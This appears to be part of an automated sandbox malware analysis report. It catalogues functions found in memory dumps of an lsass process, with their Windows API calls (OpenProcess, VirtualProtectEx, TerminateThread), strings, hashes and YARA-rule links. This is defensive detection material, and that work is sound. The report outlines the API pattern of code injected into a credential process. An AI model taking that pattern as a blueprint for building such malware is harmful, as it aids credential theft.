Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: ae81e54e8e29fef949cdf2b766ead47be9054d0acc44a326ed427ccb5dba9222
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 8F118631318F4086EB50CB56E8583D972A1F7A9FECF044215EA5D8B798EF79C7488744

Function 00000213BDCE5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000213BDCE5C4B
GetThreadContext.KERNEL32 ref: 00000213BDCE5DB5

Part of subcall function 00000213BDCE5A40: GetCurrentThreadId.KERNEL32 ref: 00000213BDCE5A44

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 67465ba89eb819beb97428597d286ff6ed36852c47c5d97a5a91c13633ff9173
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 6CD19E76219B8886DE70DB19E49439A77A1F398B8CF100126EACD47BA9DF3DD741CB04

Function 00000213BDCE30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE30D7
HeapAlloc.KERNEL32 ref: 00000213BDCE30EA
StrCmpNIW.SHLWAPI ref: 00000213BDCE316B
GetProcessHeap.KERNEL32 ref: 00000213BDCE31D1
HeapFree.KERNEL32 ref: 00000213BDCE31DF

Strings

dialer, xrefs: 00000213BDCE3164

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: f801f377698cdbac55d20d9e27f3ee8d5aa60ea3fe96cb9ba27e623178e67f28
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 3531A571709F5993EF15CF1698083E963A2FB65B8DF0480349E4847B54FB3AE7A58700

Function 00000213BDCE1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000213BDCE1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000213BDCE1A58
PathFindFileNameW.SHLWAPI ref: 00000213BDCE1A67
lstrlenW.KERNEL32 ref: 00000213BDCE1A73
StrCpyW.SHLWAPI ref: 00000213BDCE1A86
CloseHandle.KERNEL32 ref: 00000213BDCE1A94

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: e110916fc580362842d9f67df415d1488aa95e7e2029b08bdeffe09187ba22a8
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 42015B71308A41A6EB10DB12A45C7E963A2F798FC8F588035CE8947758EE3ECB898300

Function 00000213BDCE37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000213BDCE37C8
GetCurrentProcess.KERNEL32 ref: 00000213BDCE37D6
VirtualProtectEx.KERNEL32 ref: 00000213BDCE37F8
GetCurrentProcess.KERNEL32 ref: 00000213BDCE3819
VirtualProtectEx.KERNEL32 ref: 00000213BDCE383A
TerminateThread.KERNEL32 ref: 00000213BDCE3849

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a51b4b081aaa3ee95b9914639ca43ab62405056ded959ff562cb45bbcc6af140
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: CE115BB4209B4492EF24DB21E40D7DA67A2FB68B8DF040526D9490B758FF3EC70C8700

Function 00000213BDCE90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000213BDCE9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000213BDCE9198
RtlUnwindEx.NTDLL ref: 00000213BDCE91E7

Strings

csm, xrefs: 00000213BDCE917E
f, xrefs: 00000213BDCE9116

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 2aefe0c659b58780a74d809327a6d5341468524f7f9bfca2817369623e4b6a72
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 26518BB22196488BEF15CB25E44CB9977A6F3A4B8CF518130DA564B788FF76EB41C700

Function 00000213BDCE3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000213BDCE3222
StrCpyW.SHLWAPI ref: 00000213BDCE3232
StrCatW.SHLWAPI ref: 00000213BDCE323E
PathCombineW.SHLWAPI ref: 00000213BDCE324C

Strings

\\.\pipe\, xrefs: 00000213BDCE3218

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: d97ce3111bf8600455a5925fa1c43196ce8e24f725bd580d602b81ce6816eed2
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: E6F08970308F80A2EE10CB53F9081D55212A758FDCF044131DD9A4BB6DEE3DC7898700

Function 00000213BDCEA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000213BDCEA154
GetProcAddress.KERNEL32 ref: 00000213BDCEA16A
FreeLibrary.KERNEL32 ref: 00000213BDCEA187

Strings

CorExitProcess, xrefs: 00000213BDCEA163
mscoree.dll, xrefs: 00000213BDCEA14B

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 9710ce36139fc3cf2938eb608b418f4c688838cbd9fe4f143e3d187588616609
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: ECF0F471319B45E6EF58DB50E8883E51362EB6479CF442016D50B89569EE39C78CC714

Function 00000213BDCE51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000213BDCE5236

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: cbad0a52509f52af97276bf66451275c768a30f6d0d5e95c79d101ae717123fa
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 7702DC7211DB8486DB60CB55F45439ABBA1F3D4788F100125EA8E87BA9EF7DDA54CF00

Function 00000213BDCF0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000213BDCF08A2
GetConsoleMode.KERNEL32 ref: 00000213BDCF0960
GetLastError.KERNEL32 ref: 00000213BDCF09EA

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: ada3f5d83e98fdef4ac76bf815d5529dc191443047ee9fb3c149366cca31c3fd
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0281F333618A0489FF90DB6488483ED27A3F364F8CF540226DE0A5B79AFB368749D310

Function 00000213BDCE57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000213BDCE5806

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 06613ef93601e72356b79dcc7801bdfc1c98213d6687eafd3f2aa6b970ef7109
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 7361FA7652DB84C7EB60CB15E44839A7BA1F39874CF500225EA8D47BA8EB7DDB41CB04

Function 00000213BDCF1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000213BDCF1EE0
_set_statfp.LIBCMT ref: 00000213BDCF1EFB
_set_statfp.LIBCMT ref: 00000213BDCF1F17
_set_statfp.LIBCMT ref: 00000213BDCF1F53

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 3ac832b51b6da4c9b4b973bf2f9159b0d765b142ca189ced1ff732489cc422cd
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C111C632A5CA0002FE98D565E45E3E550436B7437CF552624FA768E3DEFB368F4A4304

Function 00000213BDCC12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000213BDCC12E0
_set_statfp.LIBCMT ref: 00000213BDCC12FB
_set_statfp.LIBCMT ref: 00000213BDCC1317
_set_statfp.LIBCMT ref: 00000213BDCC1353

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 70dc06f7c565cf02028d5e1344b90388ac65da7d0a9fba8a964b6d096c1b0bd3
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 70110632A4CE4005FE649167E45E3E90043AB76F7CF5C2224AB7606FD6FA3A8F424380

Function 00000213BDCE9658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000213BDCE9677
SetLastError.KERNEL32 ref: 00000213BDCE96FE

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: 52af176cee707ae470231b5588ad61526f764324f02d01539a8ac92cc1ad8960
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: B61196B021924883FE50DB65A84C3D53297AB647ACF144635D92A0B3D9FE3EEB06C704

Function 00000213BDCE3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000213BDCE3886
GetCurrentProcess.KERNEL32 ref: 00000213BDCE38B4
VirtualProtectEx.KERNEL32 ref: 00000213BDCE38D6
GetCurrentProcess.KERNEL32 ref: 00000213BDCE38F4
VirtualProtectEx.KERNEL32 ref: 00000213BDCE3915

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 65c4e098b475e352f70dc6395cf218f7b81b569124b6fa99ea398d3c25f57676
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 1C11487A708B4093EF149B11F4082E966A2F758B9DF04402ADE890B798FF3ED709C704

Function 00000213BDCB84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000213BDCB8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000213BDCB8598

Strings

csm, xrefs: 00000213BDCB857E
f, xrefs: 00000213BDCB8516

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 3b4f11c57579acca9e6260cd8cc4d678e90f4f931dffd807d2415ac6866272ac
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 7D51B3327596048FEF18DF15E848B993796FB68B9CF958124DA0647788FB36CB41C708

Function 00000213BDCB84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000213BDCB8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000213BDCB8598

Strings

csm, xrefs: 00000213BDCB857E
f, xrefs: 00000213BDCB8516

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: c8f45d26a079089a1b3698ef975e42836bc3bfd45d26f0831fe668944e37faaf
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 5331C07225964486FF18DF16E84879937A6FB68BCCF158014AE4A07784EB3ACB45C708

Function 00000213BDCE14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE14D5
HeapFree.KERNEL32 ref: 00000213BDCE14E4
GetProcessHeap.KERNEL32 ref: 00000213BDCE14F0
HeapFree.KERNEL32 ref: 00000213BDCE14FF
GetProcessHeap.KERNEL32 ref: 00000213BDCE152A

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 24dcad78d2841b5b21ec27df98696d3737fecaf9eec13bf351fff8f910bd68dd
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: FA115E31618F8892EB54DF66A8482DA7372F39AB88F048129DB8A07758EF39C255C740

Function 00000213BDCE24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000213BDCE25C3
StrCpyW.SHLWAPI ref: 00000213BDCE25DA

Strings

\\.\pipe\, xrefs: 00000213BDCE25CE

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 112bcaf71cb953d0bd586880c9aa20abfb9be29409723a9c0cfefd87b0a28076
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B151E87220C78983EE34DF69955C3EAA656F7A978CF000135DD8A07B99EA37E7058B40

Function 00000213BDCF0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000213BDCF071B
GetLastError.KERNEL32 ref: 00000213BDCF073D

Strings

U, xrefs: 00000213BDCF06C7

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 5010075a01dd40ef79e11326e5b6381b4a742213af0030611b8a090cc07568aa
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: ED41A672218A4091EB50DF65E4493D9A7A2F398B8CF504125EE8D8B798EF3DC745CB40

Function 00000213BDCED6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000213BDCED6F9
LCMapStringW.KERNEL32 ref: 00000213BDCED781

Strings

LCMapStringEx, xrefs: 00000213BDCED6DC, 00000213BDCED6ED

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 8417189806ab5f8662dc880ff3f87f861316437b023783a6ee40e2255c0d5dcb
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 7A114A3620CB8086DB60CB16F4846DAB7A1F7D9BC8F544126EE8D87B19EF39C644CB00

Function 00000213BDCE94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000213BDCE94E8
RaiseException.KERNEL32 ref: 00000213BDCE952E

Strings

csm, xrefs: 00000213BDCE951B

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: fce6ffe3dbb7913867e83c386da277b62eeaad4941d52154dd0c749f50d6f5a8
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: BD114F72209B8482EF61CF15E44429977A1F798B9CF184224DF8D0B768EF39C655CB00

Function 00000213BDCED65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000213BDCED68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000213BDCED6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000213BDCED681

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 5eafdd023e4cf428bb2a44b0805ce4b387830978f5eea1835fef4c3027aa3cb3
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: A3F0823131CB8492EF05DB81F4486D57322AB98B9CF485425E95D0BB59EE3ACB99C710

Function 00000213BDCED608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000213BDCED631
TlsSetValue.KERNEL32 ref: 00000213BDCED648

Strings

FlsSetValue, xrefs: 00000213BDCED61E

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 05651bc7bdcf09ca11739f396a60c9467aa48a5f9dcddb97cd3f456c9e5dc4cb
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 8FE0657120C64592EE05CB50F84C6D42223BB9878CF484021D50D0E259EE3ACB5DC710

Function 00000213BDCBCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000213BDCBCBC5

Strings

November, xrefs: 00000213BDCBCBA8, 00000213BDCBCBB2
October, xrefs: 00000213BDCBCBBE

Memory Dump Source

Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: ca61c4de39712737f3cf4f66e713e3b801370783a370d7679ecab60ef7900894
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 9FE0923520C54A92FF04DB65F5493E962239BB4B4CF5D90219A5906253FF3ACB968780

Function 00000213BDCE1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE1D9B
HeapAlloc.KERNEL32 ref: 00000213BDCE1DAA
GetProcessHeap.KERNEL32 ref: 00000213BDCE1E1E
HeapFree.KERNEL32 ref: 00000213BDCE1E2C

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: f10e8809f8af8c1d30320e44ac1293a3d957f3bd13b7a08073e9ade6dddfb1bd
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: A2217172609B9482EF11CF59A4082DAB3A1FB98B9CF055120EE8C47B18FA79D7568700

Function 00000213BDCE1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE127A
HeapAlloc.KERNEL32 ref: 00000213BDCE1289
GetProcessHeap.KERNEL32 ref: 00000213BDCE12A3
HeapAlloc.KERNEL32 ref: 00000213BDCE12B4

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: e6ccd0979defd27978268ec1f10417e694653bc2cfef9fe92541daa03e9477eb
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: ACE06D71611A0096EB04CF62D80C3C936E2FB99F09F48C024C9090B354EF7E8699C740

Analysis Process: svchost.exePID: 920, Parent PID: 8080COMMON

Execution Graph

